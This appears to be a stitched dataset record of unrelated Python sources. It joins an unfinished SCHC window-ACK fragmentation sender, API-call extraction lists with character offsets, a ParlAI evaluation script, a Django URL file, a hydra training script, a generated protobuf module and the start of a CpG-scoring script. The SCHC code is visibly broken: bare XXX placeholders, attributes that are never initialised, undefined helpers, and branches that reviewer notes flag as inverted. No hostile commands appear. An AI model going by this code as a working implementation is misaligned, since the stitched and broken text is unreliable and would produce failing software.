        assert ( (len(mic) == 0 and advertized_fcn != self.get_all_1())
                 or (len(mic) != 0 and advertized_fcn == self.get_all_1()))
        if len(mic) > 0:
            bit_buffer.add_bits(mic, self.M)
        bit_buffer.add_bits(payload, 8*len(payload))
        return bit_buffer.get_content()
    def pack_empty_fragment(self, advertized_fcn):
        # 1083    <------------ R ------------>
        # 1084             <- T -> 1 <- N ->
        # 1085   +-- ... --+- ... -+-+- ... -+
        # 1086   | Rule ID |  DTag |W|  0..0 |  TODO
        # 1087   +-- ... --+- ... -+-+- ... -+
        # 1088
        # 1089          Figure 13: All-0 empty format fragment
        # XXX
        raise RuntimeError("Not implemented yet: XXX")
    def unpack_fragment_or_ack(self):
        """Placeholder: parse an incoming fragment or ACK (not implemented)."""
        pass
    def pack_ack(self, XXX):
        """Placeholder: build an ACK message (not implemented)."""
        pass
#---------------------------------------------------------------------------
# Delay inserted between two consecutive fragment transmissions.
INTER_FRAGMENT_DELAY = 1.0 # seconds
# How long the sender waits for the receiver's ACK bitmap before retrying.
WAIT_BITMAP_TIMEOUT = 5.0 # seconds
class WindowAckModeSender:
    """The fragmentation manager handles the logic of the fragment sending etc.

    Sender side of SCHC Window mode with ACK: slices ``full_packet`` into
    windows of fragments, sends them via ``system_manager`` and reacts to
    the receiver's bitmap ACKs.  State machine visible in this code:
    INIT -> SEND -> WAIT BITMAP -> (SEND | END).
    NOTE(review): this class is work-in-progress; several attributes it
    reads (``self.mic``, ``self.bitmap``, ``self.window``, ``self.max_fcn``,
    ``self.fcn``, ``self.fragment_index``, ``self.content``, ``self.position``)
    are never initialized here, and some called helpers are undefined.
    """
    def __init__(self, system_manager, fragment_format_XXX_unused, full_packet,
                 rule_id, dtag, window_max_size, fragment_size):
        # system_manager is expected to provide send_packet() and
        # add_event(delay, callback, args) -- TODO confirm its interface.
        self.rule_id = rule_id
        self.dtag = dtag
        # Hard-wired SCHC header geometry (all sizes in bits).
        R = 16 # header size
        T = 4 # DTag size
        N = 4 # FCN size
        M = 8 # MIC size
        BITMAP_SIZE = 8 # bits
        self.system_manager = system_manager
        # XXX: use soichi code again:
        #fragment.fp = fragment_format #XXX: hack
        #self.fragment = fragment.fragment(
        #    srcbuf=full_packet, rule_id=rule_id, dtag=dtag,
        #    noack=False, window_size=window_size)
        ##self.fragment = fragment.fragment(
        ##    srcbuf=full_packet, dtag=dtag, rid=rule_id)
        #print(self.fragment.__dict__) #XXX
        self.fragment_size = fragment_size
        # Ceiling division: total number of fragments for the whole packet.
        self.nb_fragment = (len(full_packet) + fragment_size-1) // fragment_size
        # 1376 Intially, when a fragmented packet need to be sent, the window is set
        # 1377 to 0, a local_bit map is set to 0, and FCN is set the the highe
        # 1378 possible value depending on the number of fragment that will be sent
        # 1379 in the window (INIT STATE).
        self.state = "INIT"
        self.window_index = 0
        # (some of these variables are duplicates of the class fragment.fragment)
        self.full_packet = full_packet
        self.full_packet_position = 0
        self.window_index = 0
        self.window_max_size = window_max_size
        self.R = R
        self.T = T
        self.N = N
        self.M = M
        self.format_mgr = SchcFragmentFormat(R=R, T=T, N=N, M=M, mode="window")
        print("STATE INIT, fragmentation parameters:")
        print("  nb_fragment={}".format(self.nb_fragment))
        print("  fragment_size={}".format(fragment_size))
        print("  R(header size)={}".format(self.R))
        print("  T(DTag size)={}".format(self.T))
        print("  N(FCN size)={}".format(self.N))
        self.init_current_window()
    def init_current_window(self):
        """Slice the next window's fragments out of full_packet and reset
        the per-window cursor."""
        # pre-compute the fragments to send in the window, and init variables.
        # (the fragment_size is allowed to be changed between windows)
        assert self.full_packet_position < len(self.full_packet)
        remaining_nb_byte = len(self.full_packet) - self.full_packet_position
        remaining_nb_fragment = (
            (remaining_nb_byte + self.fragment_size-1) // self.fragment_size )
        assert remaining_nb_fragment > 0
        self.is_last_window = (remaining_nb_fragment < self.window_max_size)
        if not self.is_last_window:
            self.window_size = self.window_max_size
        else: self.window_size = remaining_nb_fragment
        p, fs = self.full_packet_position, self.fragment_size
        self.fragment_list = [ self.full_packet[p+i*fs:p+(i+1)*(fs)]
                               for i in range(self.window_size)]
        self.window_fragment_index = 0
        # NOTE(review): the "window #" placeholder is filled with
        # self.window_size, not the window number -- looks like a typo.
        print("window #{} last={} nb_frag={}\n frag={}".format(
            self.window_size, self.is_last_window, self.window_size,
            self.fragment_list))
    #--------------------------------------------------
    def start(self):
        """Leave INIT and send the first fragment of the first window."""
        assert self.state == "INIT"
        self.state = "SEND"
        self.send_current_fragment()
    def get_current_fcn(self):
        """Return (fcn_value_to_advertise, is_very_last_fragment)."""
        fi = self.window_fragment_index
        if self.is_last_window and fi == self.window_size-1:
            # 913 are expected when there is no error.  The FCN for the last fragment
            # 914 is an all-1.  It is also important to note that, for No ACK mode or
            return self.format_mgr.get_all_1(), True
        else:
            # FCN counts down from window_size-1 to 0 within the window.
            return self.window_size-1 - fi, False
    def send_current_fragment(self):
        """Pack and send the fragment at the window cursor, then either arm
        the WAIT BITMAP timer (end of window) or schedule the next send."""
        assert self.state == "SEND"
        frag_content = self.fragment_list[self.window_fragment_index]
        advertized_fcn, is_very_last_fragment = self.get_current_fcn()
        if is_very_last_fragment:
            # NOTE(review): self.mic is never assigned anywhere in this
            # class -- this branch raises AttributeError as written.
            mic = self.mic
        else: mic = b""
        full_fragment = self.format_mgr.pack_fragment(
            rule_id = self.rule_id, dtag = self.dtag,
            window_index = self.window_index,
            advertized_fcn = advertized_fcn,
            payload = frag_content, mic = mic
        )
        self.system_manager.send_packet(full_fragment)
        # 1384 regulation rules or constraints imposed by the applications.  Each
        # 1385 time a fragment is sent the FCN is decreased of one value and the
        # 1386 bitmap is set.  The send state can be leaved for different reasons
        # XXX: is the bitmap the one of the FCN?
        if self.window_fragment_index == self.window_size-1:
            # 1386 bitmap is set.  The send state can be leaved for different reasons
            # 1387 (for both reasons it goes to WAIT BITMAP STATE):
            self.state = "WAIT BITMAP"
            if is_very_last_fragment:
                # 1471 [...] FCN==0 & more frags [...]
                # 1389 o The FCN reaches value 0 and there are more fragments.  In that
                # 1390 case an all-0 fragmet is sent and the timer is set.  The sender
                # 1391 will wait for the bitmap acknowledged by the receiver.
                self.system_manager.add_event(
                    WAIT_BITMAP_TIMEOUT,
                    self.event_wait_bitmap_timeout_check, (self.window_index, False))
            else:
                # 1471 [...] last frag [...]
                # 1393 o The last fragment is sent.  In that case an all-1 fragment with
                # 1394 the MIC is sent and the sender will wait for the bitmap
                # 1395 acknowledged by the receiver.  The sender set a timer to wait for
                # 1396 the ack.
                # NOTE(review): the (.., False)/(.., True) final flags look
                # swapped relative to the quoted draft text -- verify.
                self.system_manager.add_event(
                    WAIT_BITMAP_TIMEOUT,
                    self.event_wait_bitmap_timeout_check, (self.window_index, True))
        else:
            self.window_fragment_index += 1
            self.system_manager.add_event(
                INTER_FRAGMENT_DELAY, self.event_next_fragment, ())
    #--------------------------------------------------
    def send_empty_fragment(self):
        """Ask the receiver to (re)send its bitmap with an empty All-0/All-1."""
        # 1410 In ACK Always, if the timer expire, an empty All-0 (or All-1 if the
        # 1411 last fragment has been sent) fragment is sent to ask the receiver to
        # NOTE(review): branches look inverted w.r.t. the quoted draft text
        # (All-1 is for the last window), and the two lines below are
        # placeholders: bare ``XXX`` and undefined ``empty_fragment`` make
        # this method fail at runtime.
        if self.is_last_window:
            advertized_fcn = self.format_mgr.get_all_0()
        else: advertized_fcn = self.format_mgr.get_all_1()
        XXX
        self.system_manager.send_packet(empty_fragment)
    def is_finished(self):
        """True when the whole packet has been consumed.
        NOTE(review): reads ``self.position`` which is never set --
        presumably meant ``self.full_packet_position``; confirm."""
        return not (self.position < len(self.full_packet))
    def get_next_fragment_real(self):
        # NOTE(review): ``self.fragment`` is only created in commented-out
        # code in __init__, so this helper is currently dead/broken.
        return self.fragment.next_fragment(self.fragment_size)
    def event_next_fragment(self):
        """Timer callback: send the next fragment of the current window."""
        assert self.state == "SEND"
        # 1464 [...] send Window + frag(FCN)
        self.send_current_fragment()
    def event_wait_bitmap_timeout_check(self, window_index, final):
        """Timer callback: if still waiting on the same window, poke the
        receiver for its bitmap and re-arm the timer."""
        assert window_index <= self.window_index
        if window_index != self.window_index:
            return # not really a time out (as window_index has progressed)
        assert self.state == "WAIT BITMAP"
        # 1410 In ACK Always, if the timer expire, an empty All-0 (or All-1 if the
        # 1411 last fragment has been sent) fragment is sent to ask the receiver to
        # 1412 resent its bitmap.  The window number is not changed.
        print("WAIT BITMAP: timeout")
        warnings.warn("XXX:should implement MAX_ATTEMPTS")
        self.send_empty_fragment()
        # NOTE(review): uses ``self.window`` (never initialized) where the
        # rest of the class uses ``self.window_index`` -- confirm intent.
        self.system_manager.add_event(
            WAIT_BITMAP_TIMEOUT,
            self.event_wait_bitmap_timeout_check, (self.window, True))
    def event_packet(self, raw_packet):
        """Entry point for packets received from the network: only ACK
        bitmaps in WAIT BITMAP state are expected."""
        #print("RECEIVE", raw_packet)
        if self.state == "INIT":
            print("ERROR: unexpected packet in state INIT", raw_packet)
            return
        elif self.state == "SEND":
            print("ERROR: unexpected packet in state SEND", raw_packet)
            return
        elif self.state == "WAIT BITMAP":
            # XXX:how do we know the packet format?:
            self.process_ack(raw_packet)
        else: raise RuntimeError("unexpected state", self.state)
    def process_ack(self, raw_packet):
        """Compare the receiver's bitmap with the local one and either move
        to the next window, finish, or (unimplemented) retransmit.
        NOTE(review): relies on ``self.window``, ``self.bitmap``,
        ``self.max_fcn``, ``self.get_next_fragment`` and
        ``self.send_fragment_and_prepare_next`` which are not defined in
        this class as written.
        """
        warnings.warn("XXX:hardwired formats, sizes, constants")
        window, bitmap = struct.unpack(b"!BB", raw_packet)
        bitmap = bitmap >> 1 # XXX - only for hardcoded case
        print("ACK", window, bitmap, self.bitmap)
        # 1662 If the window number on the received bitmap is correct, the sender
        if window != self.window:
            print("ERROR: bad window number", window, self.window)
            return
        if bitmap & ~self.bitmap != 0:
            print("ERROR: inconsistent bitmap", bitmap, self.bitmap)
            # XXX: what to do? - should not happen except for last
            return
        resend_bitmap = self.bitmap & ~bitmap
        if resend_bitmap == 0:
            # 1662 If the window number on the received bitmap is correct, the sender
            # 1663 compare the local bitmap with the received bitmap.  If they are equal
            # 1664 all the fragments sent during the window have been well received.  If
            if not self.is_finished():
                # 1665 at least one fragment need to be sent, the sender clear the bitmap,
                # 1666 stop the timer and move its sending window to the next value.  If no
                # XXX: (optional) stop timer
                self.window_index += 1
                self.window = self.window+1 # XXX!!: modulo
                nb_remaining_fragment = (self.nb_fragment
                                         - self.window_size * self.window_index)
                print("UPDATE:", nb_remaining_fragment, self.nb_fragment,
                      self.window_size, self.window_index)
                self.fcn = min(nb_remaining_fragment, self.max_fcn) # XXX:factor in
                unfinished, packet = self.get_next_fragment()
                self.state = "SEND"
                self.send_fragment_and_prepare_next(packet, unfinished)
            else:
                # 1667 more fragments have to be sent, then the fragmented packet
                # 1668 transmission is terminated.
                self.state = "END"
                self.event_transmission_completed()
        else:
            # 1670 If some fragments are missing (not set in the bit map) then the
            # 1671 sender resend the missing fragments.  When the retransmission is
            # 1672 finished, it start listening to the bitmap (even if a All-0 or All-1
            # 1673 has not been sent during the retransmission) and returns to the
            # 1674 waiting bitmap state.
            # 1685 If the local-bitmap is different from the received bitmap the counter
            # 1686 Attemps is increased and the sender resend the missing fragments
            # 1687 again, when a MAX_ATTEMPS is reached the sender sends an Abort and
            # 1688 goes to error.
            raise NotImplementedError("XXX not implemented yet, sorry")
    def event_transmission_completed(self):
        """Hook invoked when the whole packet has been acknowledged."""
        print("transmssion completed")
    def get_current_fragment(self):
        """Build a (hard-coded 2-byte header + ascii payload) fragment.
        NOTE(review): uses ``self.fcn``, ``self.fragment_index`` and
        ``self.content`` which are not set by __init__ -- legacy path."""
        print("fragment window={} fcn={} current_frag_index={}".format(
            self.window, self.fcn, self.fragment_index))
        header = struct.pack(b"!BB", self.window, self.fcn)
        return header + bytes(self.content[self.fragment_index].encode("ascii"))
    def process_ack_old(self, raw_packet):
        """Legacy ACK handler kept for reference; superseded by process_ack."""
        # Next fragment
        self.window = (self.window+1) % 2 # protocol
        self.fcn = self.max_fcn_per_window # - because it will be the first of the new window
        self.fragment_index += 1 # internal data structure
        if self.fragment_index == len(self.content):
            print("Finished trasnmission of fragments")
            return b""
        if self.fragment_index == len(self.content)-1:
            self.fcn = 1 # protocol - because it is the end of the content in this case
            return self.get_current_fragment() # XXX + "MIC"
        else:
            return self.get_current_fragment()
#---------------------------------------------------------------------------
|
[
"sys.path.append",
"BitBuffer.BitBuffer.__init__",
"struct.unpack",
"struct.pack",
"warnings.warn"
] |
[((120, 158), 'sys.path.append', 'sys.path.append', (['"""../../PLIDO-tanupoo"""'], {}), "('../../PLIDO-tanupoo')\n", (135, 158), False, 'import sys\n'), ((210, 238), 'sys.path.append', 'sys.path.append', (['"""../python"""'], {}), "('../python')\n", (225, 238), False, 'import sys\n'), ((490, 547), 'BitBuffer.BitBuffer.__init__', 'BitBufferModule.BitBuffer.__init__', (['self', '*args'], {}), '(self, *args, **kwargs)\n', (524, 547), True, 'import BitBuffer as BitBufferModule\n'), ((13291, 13341), 'warnings.warn', 'warnings.warn', (['"""XXX:should implement MAX_ATTEMPTS"""'], {}), "('XXX:should implement MAX_ATTEMPTS')\n", (13304, 13341), False, 'import warnings\n'), ((14098, 14154), 'warnings.warn', 'warnings.warn', (['"""XXX:hardwired formats, sizes, constants"""'], {}), "('XXX:hardwired formats, sizes, constants')\n", (14111, 14154), False, 'import warnings\n'), ((14180, 14213), 'struct.unpack', 'struct.unpack', (["b'!BB'", 'raw_packet'], {}), "(b'!BB', raw_packet)\n", (14193, 14213), False, 'import struct\n'), ((17343, 17385), 'struct.pack', 'struct.pack', (["b'!BB'", 'self.window', 'self.fcn'], {}), "(b'!BB', self.window, self.fcn)\n", (17354, 17385), False, 'import struct\n')]
|
# Copyright (c) 2017-present, Facebook, Inc.
# All rights reserved.
# This source code is licensed under the BSD-style license found in the
# LICENSE file in the root directory of this source tree. An additional grant
# of patent rights can be found in the PATENTS file in the same directory.
# <NAME>, KAIST: 2017-present
"""Basic example which iterates through the tasks specified and
evaluates the given model on them.
For example:
`python examples/eval_model.py -t "babi:Task1k:2" -m "repeat_label"`
or
`python examples/eval_model.py -t "#CornellMovie" -m "ir_baseline" -mp "-lp 0.5"`
"""
import torch
from parlai.core.agents import create_agent
from parlai.core.worlds import create_task
from parlai.core.params import ParlaiParser
import random
import pdb
import logging, sys
from examples.train_model_seq2seq_ldecay import run_eval
def main():
    """Parse ParlAI command-line options, optionally set up logging, then
    build the agent and task world and run evaluation on the valid set.

    Side effects: prints/logs evaluation output and shuts the world down.
    """
    # Get command line arguments
    parser = ParlaiParser(True, True)
    parser.set_defaults(datatype='valid')
    parser.add_argument('-logger', '--log-file', default='', help='log file name')
    parser.add_argument('--local-human', default=True, type='bool', help='log file name')
    parser.add_argument('--display-examples', default=False, type='bool', help='')
    parser.add_argument('--split-gpus', type=bool, default=False, help='Split gpus for a large model.')
    opt = parser.parse_args()

    # Set logging.
    # BUG FIX: the original used ``opt['log_file'] is not ''`` (object
    # identity, not string equality) and left ``logger`` undefined when no
    # log file was given, so the run_eval() call below raised NameError.
    logger = None
    if opt['log_file'] != '':
        logger = logging.getLogger('Evaluation: Seq2seq')
        logger.setLevel(logging.INFO)
        fmt = logging.Formatter('%(asctime)s: %(message)s', '%m/%d/%Y %I:%M:%S %p')
        console = logging.StreamHandler()
        console.setFormatter(fmt)
        logger.addHandler(console)
        if 'log_file' in opt:
            logfile = logging.FileHandler(opt['log_file'], 'w')
            logfile.setFormatter(fmt)
            logger.addHandler(logfile)
        logger.info('[ COMMAND: %s ]' % ' '.join(sys.argv))

    # Possibly build a dictionary (not all models do this).
    #assert opt['dict_file'] is None, '[ Put dict file ]'

    # Create model and assign it to the specified task
    agent = create_agent(opt)
    world = create_task(opt, agent)
    # NOTE(review): logger is None when --log-file is unset; confirm
    # run_eval accepts logger=None.
    run_eval(agent, opt, 'valid', write_log=True, logger=logger, generate=True, local_human=opt['local_human'])
    world.shutdown()
# Script entry point.
if __name__ == '__main__':
    main()
|
[
"logging.FileHandler",
"parlai.core.worlds.create_task",
"logging.StreamHandler",
"parlai.core.params.ParlaiParser",
"logging.Formatter",
"examples.train_model_seq2seq_ldecay.run_eval",
"parlai.core.agents.create_agent",
"logging.getLogger"
] |
[((905, 929), 'parlai.core.params.ParlaiParser', 'ParlaiParser', (['(True)', '(True)'], {}), '(True, True)\n', (917, 929), False, 'from parlai.core.params import ParlaiParser\n'), ((2156, 2173), 'parlai.core.agents.create_agent', 'create_agent', (['opt'], {}), '(opt)\n', (2168, 2173), False, 'from parlai.core.agents import create_agent\n'), ((2186, 2209), 'parlai.core.worlds.create_task', 'create_task', (['opt', 'agent'], {}), '(opt, agent)\n', (2197, 2209), False, 'from parlai.core.worlds import create_task\n'), ((2219, 2330), 'examples.train_model_seq2seq_ldecay.run_eval', 'run_eval', (['agent', 'opt', '"""valid"""'], {'write_log': '(True)', 'logger': 'logger', 'generate': '(True)', 'local_human': "opt['local_human']"}), "(agent, opt, 'valid', write_log=True, logger=logger, generate=True,\n local_human=opt['local_human'])\n", (2227, 2330), False, 'from examples.train_model_seq2seq_ldecay import run_eval\n'), ((1439, 1479), 'logging.getLogger', 'logging.getLogger', (['"""Evaluation: Seq2seq"""'], {}), "('Evaluation: Seq2seq')\n", (1456, 1479), False, 'import logging, sys\n'), ((1532, 1601), 'logging.Formatter', 'logging.Formatter', (['"""%(asctime)s: %(message)s"""', '"""%m/%d/%Y %I:%M:%S %p"""'], {}), "('%(asctime)s: %(message)s', '%m/%d/%Y %I:%M:%S %p')\n", (1549, 1601), False, 'import logging, sys\n'), ((1620, 1643), 'logging.StreamHandler', 'logging.StreamHandler', ([], {}), '()\n', (1641, 1643), False, 'import logging, sys\n'), ((1765, 1806), 'logging.FileHandler', 'logging.FileHandler', (["opt['log_file']", '"""w"""'], {}), "(opt['log_file'], 'w')\n", (1784, 1806), False, 'import logging, sys\n')]
|
from django.urls import path
from django.conf.urls import url
from reporter import views as r_views
from djgeojson.views import GeoJSONLayerView
from reporter import models as r_models
# URL routes for the reporter app.
urlpatterns = [
    # Landing page.
    path('home', r_views.Prohome, name='home'),
    # Report form keyed by a :code path parameter.
    path('report/<str:code>/', r_views.Proreporter, name='code'),
    # GeoJSON layer serialized from the RealMapping model (djgeojson).
    path('data.geojson', GeoJSONLayerView.as_view(model=r_models.RealMapping), name='data')
]
|
[
"djgeojson.views.GeoJSONLayerView.as_view",
"django.urls.path"
] |
[((206, 248), 'django.urls.path', 'path', (['"""home"""', 'r_views.Prohome'], {'name': '"""home"""'}), "('home', r_views.Prohome, name='home')\n", (210, 248), False, 'from django.urls import path\n'), ((254, 314), 'django.urls.path', 'path', (['"""report/<str:code>/"""', 'r_views.Proreporter'], {'name': '"""code"""'}), "('report/<str:code>/', r_views.Proreporter, name='code')\n", (258, 314), False, 'from django.urls import path\n'), ((341, 393), 'djgeojson.views.GeoJSONLayerView.as_view', 'GeoJSONLayerView.as_view', ([], {'model': 'r_models.RealMapping'}), '(model=r_models.RealMapping)\n', (365, 393), False, 'from djgeojson.views import GeoJSONLayerView\n')]
|
import os
import sys
# Resolve the directory containing this file and its parent directory, then
# prepend the parent and its pointnet2_ops_lib/ subdirectory to sys.path so
# the local packages can be imported without installation.
pointnet2_dir = os.path.split(os.path.abspath(__file__))[0]
main_dir = "/".join(pointnet2_dir.split("/")[0:-1])
pointnet2_ops_lib_dir = main_dir+"/pointnet2_ops_lib/"
sys.path.insert(0,main_dir)
sys.path.insert(0,pointnet2_ops_lib_dir)
import hydra
import omegaconf
import pytorch_lightning as pl
import torch
from pytorch_lightning.loggers import TensorBoardLogger
from surgeon_pytorch import Inspect,get_layers
# Enable cuDNN and let it benchmark/auto-select convolution algorithms;
# faster for fixed input shapes after the first iterations.
torch.backends.cudnn.enabled = True
torch.backends.cudnn.benchmark = True
def hydra_params_to_dotdict(hparams):
    """Flatten a (possibly nested) hydra/omegaconf config into a flat dict
    whose keys use dot notation, keeping only scalar leaf values
    (str/int/float/bool); other value types are dropped."""
    def _flatten(cfg, prefix=""):
        flat = {}
        for key, value in cfg.items():
            name = prefix + key
            if isinstance(value, omegaconf.DictConfig):
                # recurse, threading the accumulated dotted prefix down
                flat.update(_flatten(value, name + "."))
            elif isinstance(value, (str, int, float, bool)):
                flat[name] = value
        return flat
    return _flatten(hparams)
@hydra.main("config/config.yaml")
def main(cfg):
    """Instantiate the task model from the hydra config and set up a
    pytorch-lightning Trainer; training/testing calls are currently
    commented out and only the model's layers are printed."""
    # hyperparameters are passed to the model as a flattened dot-notation dict
    model = hydra.utils.instantiate(cfg.task_model, hydra_params_to_dotdict(cfg))
    # stop after 5 epochs without improvement (monitored metric is the
    # callback's default here)
    early_stop_callback = pl.callbacks.EarlyStopping(patience=5)
    # keep the 2 best checkpoints by validation accuracy
    # NOTE(review): `filepath=` is the old ModelCheckpoint API — confirm the
    # pinned pytorch-lightning version still supports it
    checkpoint_callback = pl.callbacks.ModelCheckpoint(
        monitor="val_acc",
        mode="max",
        save_top_k=2,
        filepath=os.path.join(
            cfg.task_model.name, "{epoch}-{val_loss:.2f}-{val_acc:.3f}"
        ),
        verbose=True,
    )
    trainer = pl.Trainer(
        gpus=list(cfg.gpus),
        max_epochs=cfg.epochs,
        early_stop_callback=early_stop_callback,
        checkpoint_callback=checkpoint_callback,
        distributed_backend=cfg.distrib_backend
    )
    # surgeon_pytorch helper: print the model's layer names
    print(get_layers(model))
    # trainer.fit(model)
    # trainer.test(model)
if __name__ == "__main__":
    main()
|
[
"os.path.abspath",
"sys.path.insert",
"surgeon_pytorch.get_layers",
"hydra.main",
"pytorch_lightning.callbacks.EarlyStopping",
"os.path.join"
] |
[((191, 219), 'sys.path.insert', 'sys.path.insert', (['(0)', 'main_dir'], {}), '(0, main_dir)\n', (206, 219), False, 'import sys\n'), ((219, 260), 'sys.path.insert', 'sys.path.insert', (['(0)', 'pointnet2_ops_lib_dir'], {}), '(0, pointnet2_ops_lib_dir)\n', (234, 260), False, 'import sys\n'), ((954, 986), 'hydra.main', 'hydra.main', (['"""config/config.yaml"""'], {}), "('config/config.yaml')\n", (964, 986), False, 'import hydra\n'), ((1115, 1153), 'pytorch_lightning.callbacks.EarlyStopping', 'pl.callbacks.EarlyStopping', ([], {'patience': '(5)'}), '(patience=5)\n', (1141, 1153), True, 'import pytorch_lightning as pl\n'), ((52, 77), 'os.path.abspath', 'os.path.abspath', (['__file__'], {}), '(__file__)\n', (67, 77), False, 'import os\n'), ((1670, 1687), 'surgeon_pytorch.get_layers', 'get_layers', (['model'], {}), '(model)\n', (1680, 1687), False, 'from surgeon_pytorch import Inspect, get_layers\n'), ((1296, 1369), 'os.path.join', 'os.path.join', (['cfg.task_model.name', '"""{epoch}-{val_loss:.2f}-{val_acc:.3f}"""'], {}), "(cfg.task_model.name, '{epoch}-{val_loss:.2f}-{val_acc:.3f}')\n", (1308, 1369), False, 'import os\n')]
|
# Generated by the protocol buffer compiler. DO NOT EDIT!
# source: yacht/config/proto/policy.proto
import sys
_b=sys.version_info[0]<3 and (lambda x:x) or (lambda x:x.encode('latin1'))
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
from yacht.config.proto import feature_extractor_pb2 as yacht_dot_config_dot_proto_dot_feature__extractor__pb2
from yacht.config.proto import net_architecture_pb2 as yacht_dot_config_dot_proto_dot_net__architecture__pb2
DESCRIPTOR = _descriptor.FileDescriptor(
name='yacht/config/proto/policy.proto',
package='yacht.config.proto',
syntax='proto3',
serialized_options=None,
serialized_pb=_b('\n\x1fyacht/config/proto/policy.proto\x12\x12yacht.config.proto\x1a*yacht/config/proto/feature_extractor.proto\x1a)yacht/config/proto/net_architecture.proto\"\xb7\x01\n\x0cPolicyConfig\x12\x0c\n\x04name\x18\x01 \x01(\t\x12\x15\n\ractivation_fn\x18\x02 \x01(\t\x12\x45\n\x11\x66\x65\x61ture_extractor\x18\x03 \x01(\x0b\x32*.yacht.config.proto.FeatureExtractorConfig\x12;\n\x08net_arch\x18\x04 \x01(\x0b\x32).yacht.config.proto.NetArchitectureConfigb\x06proto3')
,
dependencies=[yacht_dot_config_dot_proto_dot_feature__extractor__pb2.DESCRIPTOR,yacht_dot_config_dot_proto_dot_net__architecture__pb2.DESCRIPTOR,])
_POLICYCONFIG = _descriptor.Descriptor(
name='PolicyConfig',
full_name='yacht.config.proto.PolicyConfig',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='name', full_name='yacht.config.proto.PolicyConfig.name', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='activation_fn', full_name='yacht.config.proto.PolicyConfig.activation_fn', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='feature_extractor', full_name='yacht.config.proto.PolicyConfig.feature_extractor', index=2,
number=3, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='net_arch', full_name='yacht.config.proto.PolicyConfig.net_arch', index=3,
number=4, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=143,
serialized_end=326,
)
_POLICYCONFIG.fields_by_name['feature_extractor'].message_type = yacht_dot_config_dot_proto_dot_feature__extractor__pb2._FEATUREEXTRACTORCONFIG
_POLICYCONFIG.fields_by_name['net_arch'].message_type = yacht_dot_config_dot_proto_dot_net__architecture__pb2._NETARCHITECTURECONFIG
DESCRIPTOR.message_types_by_name['PolicyConfig'] = _POLICYCONFIG
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
PolicyConfig = _reflection.GeneratedProtocolMessageType('PolicyConfig', (_message.Message,), dict(
DESCRIPTOR = _POLICYCONFIG,
__module__ = 'yacht.config.proto.policy_pb2'
# @@protoc_insertion_point(class_scope:yacht.config.proto.PolicyConfig)
))
_sym_db.RegisterMessage(PolicyConfig)
# @@protoc_insertion_point(module_scope)
|
[
"google.protobuf.symbol_database.Default",
"google.protobuf.descriptor.FieldDescriptor"
] |
[((455, 481), 'google.protobuf.symbol_database.Default', '_symbol_database.Default', ([], {}), '()\n', (479, 481), True, 'from google.protobuf import symbol_database as _symbol_database\n'), ((2479, 2854), 'google.protobuf.descriptor.FieldDescriptor', '_descriptor.FieldDescriptor', ([], {'name': '"""feature_extractor"""', 'full_name': '"""yacht.config.proto.PolicyConfig.feature_extractor"""', 'index': '(2)', 'number': '(3)', 'type': '(11)', 'cpp_type': '(10)', 'label': '(1)', 'has_default_value': '(False)', 'default_value': 'None', 'message_type': 'None', 'enum_type': 'None', 'containing_type': 'None', 'is_extension': '(False)', 'extension_scope': 'None', 'serialized_options': 'None', 'file': 'DESCRIPTOR'}), "(name='feature_extractor', full_name=\n 'yacht.config.proto.PolicyConfig.feature_extractor', index=2, number=3,\n type=11, cpp_type=10, label=1, has_default_value=False, default_value=\n None, message_type=None, enum_type=None, containing_type=None,\n is_extension=False, extension_scope=None, serialized_options=None, file\n =DESCRIPTOR)\n", (2506, 2854), True, 'from google.protobuf import descriptor as _descriptor\n'), ((2874, 3226), 'google.protobuf.descriptor.FieldDescriptor', '_descriptor.FieldDescriptor', ([], {'name': '"""net_arch"""', 'full_name': '"""yacht.config.proto.PolicyConfig.net_arch"""', 'index': '(3)', 'number': '(4)', 'type': '(11)', 'cpp_type': '(10)', 'label': '(1)', 'has_default_value': '(False)', 'default_value': 'None', 'message_type': 'None', 'enum_type': 'None', 'containing_type': 'None', 'is_extension': '(False)', 'extension_scope': 'None', 'serialized_options': 'None', 'file': 'DESCRIPTOR'}), "(name='net_arch', full_name=\n 'yacht.config.proto.PolicyConfig.net_arch', index=3, number=4, type=11,\n cpp_type=10, label=1, has_default_value=False, default_value=None,\n message_type=None, enum_type=None, containing_type=None, is_extension=\n False, extension_scope=None, serialized_options=None, file=DESCRIPTOR)\n", (2901, 3226), True, 'from 
google.protobuf import descriptor as _descriptor\n')]
|
#!/usr/bin/env python
# coding: utf-8
import argparse
import concurrent.futures
import logging
import numpy as np
import pandas as pd
import pyBigWig
import pysam
import os
import re
import sys
from Bio import SeqIO
from Bio.Seq import Seq
from collections import Counter
from numpy.lib.stride_tricks import sliding_window_view
from operator import itemgetter
from tqdm import tqdm
# Hide all GPUs from the deep-learning backend so model inference runs on CPU.
os.environ["CUDA_VISIBLE_DEVICES"] = ""
def get_args():
    """
    Get arguments from command line with argparse.

    :return: argparse.Namespace with all parsed argument values.
    """
    parser = argparse.ArgumentParser(
        prog='aligned_bam_to_cpg_scores.py',
        description="""Calculate CpG positions and scores from an aligned bam file. Outputs raw and
        coverage-filtered results in bed and bigwig format, including haplotype-specific results (when available).""")
    parser.add_argument("-b", "--bam",
                        required=True,
                        metavar="input.bam",
                        help="The aligned BAM file.")
